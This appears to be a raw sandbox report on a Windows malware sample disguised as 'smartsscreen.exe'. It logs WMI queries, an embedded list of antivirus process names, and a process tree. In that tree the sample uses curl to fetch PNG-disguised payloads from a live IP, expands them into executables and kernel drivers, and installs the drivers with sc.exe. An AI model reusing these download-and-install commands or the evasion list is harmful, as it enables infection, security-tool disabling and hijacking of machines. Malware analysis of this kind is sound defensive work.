Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process
Source: C:\Users\user\Desktop\smartsscreen.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, ProcessID, ExecutablePath, CommandLine FROM Win32_Process

Source: C:\Users\user\Desktop\smartsscreen.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: smartsscreen.exe, 00000000.00000003.2071230526.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, smartsscreen.exe, 00000000.00000003.2070330438.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT Name, ExecutablePath, CommandLine, Priority, CreationDate, ProcessID, ThreadCount, Status, ReadOperationCount, ReadTransferCount, WriteOperationCount, WriteTransferCount FROM Win32_Process ones\AppData\Local\Microsoft\WindowsApps;

Source: smartsscreen.exe	ReversingLabs: Detection: 60%
Source: smartsscreen.exe	Virustotal: Detection: 76%

Source: curl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: curl.exe	String found in binary or memory: --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation
Source: curl.exe	String found in binary or memory: --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation
Source: curl.exe	String found in binary or memory: -h, --help This help text
Source: curl.exe	String found in binary or memory: -h, --help This help text
Source: curl.exe	String found in binary or memory: --interface INTERFACE Specify network interface/address to use
Source: curl.exe	String found in binary or memory: dns-ipv4-addr
Source: curl.exe	String found in binary or memory: dns-ipv6-addr
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: smartsscreen.exe	String found in binary or memory: entersyscallescanh95.exeescanhnt.exeescanv95.exeesmagent.exeespwatch.exeetcorrel.exeethereal.exeevtarmgr.exeexe.avxw.exeexecstat.exeexit status f-agnt95.exef-prot95.exef-secure.exefilebeat.exefindviru.exefiretray.exefirewall.exefortiedr.exefsdevcon.exefsgk32st.exefsguidll.exefsguiexe.exefshdll32.exefsorsp64.exegcasserv.exegcpacertracegenerics.exegetaddrinfowguarddog.exeguardgui.exehipsmain.exehipstray.exehost is downhotactio.exehotpatch.exehttp2debug=1http2debug=2hwspanel.exeiamstats.exeicload95.exeicloadnt.exeicsupp95.exeicsuppnt.exeiedriver.exeigateway.exeillegal seekinetlnfo.exeinonmsrv.exeinouptng.exeinvalid baseinvalid portinvalid slotiphlpapi.dllisafinst.exeisntsmtp.exeispwdsvc.exeitmrtsvc.exekavfsrcn.exekavfsscs.exekavisarv.exekavshell.exekavstart.exekavsvcui.exekernel32.dllkernel32.exeklnagent.exeklserver.exeklwtblfs.exekmailmon.exeknownsvr.exeknsdtray.exekpfwtray.exekrbcc32s.exeksafesvc.exekvdetech.exekvolself.exekxescore.exelauncher.exeldnetmon.exelfstack.pushlnetinfo.exelocalnet.exelockdown.exeloggetor.exelucoms~1.exemantispm.exemasalert.exemax-forwardsmbamtray.exemcamnsvc.exemcappins.exemcconsol.exemcdetect.exemcepocfg.exemcmnhdlr.exemcmscsvc.exemcpromgr.exemcregwiz.exemcscript.exemcshield.exemcshld9x.exemcsysmon.exemctskshd.exemcupdate.exemcupdmgr.exemcvsftsn.exemcvsshld.exemcwcecfg.exemgavrtcl.exemonsvcnt.exemonsysnt.exempcmdrun.exempfagent.exemsascuil.exemscifapp.exemskagent.exemskdetct.exemsksrver.exemssecess.exemssmmc32.exemu0311ad.exemyagtsvc.exemyagttry.exen32scanw.exenailgpip.exenaprdmgr.exenavapsvc.exenavapw32.exenavectrl.exenavshcom.exencdaemon.exeneotrace.exenetapi32.dllnetarmor.exenetutils.exengserver.exenisoptui.exenlclient.exeno such hostnod32krn.exenod32kui.exenotifier.exenotstart.exenpavtray.exenpfmntor.exenpfsvice.exenprotect.exenpscheck.exenrmenctb.exensched32.exenscsrvce.exensmdreal.exenspupsvc.exenstask32.exensupdate.exentrtscan.exenupgrade.exenvarch16.exenvcsched.exenwtool16.exeokclient.exeoleaut32.dllolfsnt40.exeonlinent.exeopengl32.dlloptimize.exeostronet.exeout of rangepagentwd.exepavbckpt.exepavfires.exepavfnsvr.exepavproxy.exepavprsrv.exepavsched.exepavsrv50.exepavsrv51.exepavsrv52.exepccguide.exepcciomon.exepcclient.exepccntmon.exepccntupd.exepcctlcom.exepccwin98.exepcscnsrv.exepctsauxs.exepctstray.exepfwadmin.exepgmonitr.exepingscan.exepntiomon.exepointtopointpop3pack.exepop3trap.exeppinupdt.exepqv2isvc.exeprocdump.exeprotectx.exeproxyconnectpsimreal.exepskmssvc.exepxemtftp.exeqconsole.exeqhonline.exeqhwscsvc.exeqqpctray.exequhlpsvc.exerapuisvc.exeravalert.exercsvcmon.exeredcloak.exeredirsvc.exereflect.Copyreleasep: m=remote errorreputils.exerescue32.exerfwproxy.exernreport.exerouternt.exersnetsvr.exerssensor.exertvscn95.exerulaunch.exerun32dll.exerundll16.exeruntime: gp=ruxdll32.exesapissvc.exesav32cli.exescanwscs.exeschdsrvc.exesensendr.exesetupapi.dllsgssfw32.exeshort buffersmsectrl.exesmsetask.exesophosfs.exesophosui.exespbbcsvc.exespiderml.exespidernt.exespiderui.exespybotsd.exessg_4104.exesvcharge.exe

Source: unknown	Process created: C:\Users\user\Desktop\smartsscreen.exe "C:\Users\user\Desktop\smartsscreen.exe"
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\curl.png C:\Users\user\Desktop\curl.exe
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1716985523 -o C:\Users\user\Desktop\taskhostw.png --connect-timeout 30 --retry 10
Source: C:\Users\user\Desktop\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\taskhostw.png C:\Users\user\Desktop\taskhostw.exe
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/config.json?t=1716985532 -o C:\Users\user\Desktop\config.json --connect-timeout 30 --retry 10
Source: C:\Users\user\Desktop\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1716985534 -o C:\Users\user\Desktop\WinRing0x64.png --connect-timeout 30 --retry 10
Source: C:\Users\user\Desktop\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\WinRing0x64.png C:\Users\user\Desktop\WinRing0x64.sys
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\taskhostw.exe C:\Users\user\Desktop\taskhostw.exe
Source: C:\Users\user\Desktop\taskhostw.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/kill.png?t=1716985546 -o C:\Windows\Sysnative\drivers\aswArPots.png --connect-timeout 30 --retry 10
Source: C:\Users\user\Desktop\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\aswArPots.png C:\Windows\Sysnative\drivers\aswArPots.sys
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start aswArPots
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/delete.png?t=1716985552 -o C:\Windows\Sysnative\drivers\IObitUnlockers.png --connect-timeout 30 --retry 10
Source: C:\Users\user\Desktop\curl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\IObitUnlockers.png C:\Windows\Sysnative\drivers\IObitUnlockers.sys
Source: C:\Windows\SysWOW64\expand.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start IObitUnlockers
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\curl.png C:\Users\user\Desktop\curl.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/taskhostw.png?t=1716985523 -o C:\Users\user\Desktop\taskhostw.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\taskhostw.png C:\Users\user\Desktop\taskhostw.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/config.json?t=1716985532 -o C:\Users\user\Desktop\config.json --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/WinRing0x64.png?t=1716985534 -o C:\Users\user\Desktop\WinRing0x64.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Users\user\Desktop\WinRing0x64.png C:\Users\user\Desktop\WinRing0x64.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\taskhostw.exe C:\Users\user\Desktop\taskhostw.exe	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/kill.png?t=1716985546 -o C:\Windows\Sysnative\drivers\aswArPots.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\aswArPots.png C:\Windows\Sysnative\drivers\aswArPots.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create aswArPots binPath= C:\Windows\System32\drivers\aswArPots.sys type= kernel start= auto	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start aswArPots	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Users\user\Desktop\curl.exe C:\Users\user\Desktop\curl.exe -C - http://111.90.158.40:80/drives/delete.png?t=1716985552 -o C:\Windows\Sysnative\drivers\IObitUnlockers.png --connect-timeout 30 --retry 10	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\expand.exe C:\Windows\System32\expand.exe C:\Windows\Sysnative\drivers\IObitUnlockers.png C:\Windows\Sysnative\drivers\IObitUnlockers.sys	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe create IObitUnlockers binPath= C:\Windows\System32\drivers\IObitUnlockers.sys type= kernel start= auto	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe start IObitUnlockers	Jump to behavior

Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\smartsscreen.exe	Section loaded: wbemcomn.dll	Jump to behavior
